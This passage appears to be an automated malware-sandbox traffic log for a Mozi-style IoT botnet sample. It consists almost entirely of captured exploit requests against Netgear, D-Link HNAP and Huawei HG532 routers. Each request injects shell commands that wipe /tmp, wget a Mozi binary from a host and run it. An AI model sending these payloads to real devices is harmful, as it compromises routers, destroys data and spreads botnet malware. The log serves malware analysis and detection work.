xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 169.189.175.4:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 82.114.241.74:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 142.139.145.168:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.224.234.30:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 192.160.128.9:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 84.108.181.121:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 33.93.201.252:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
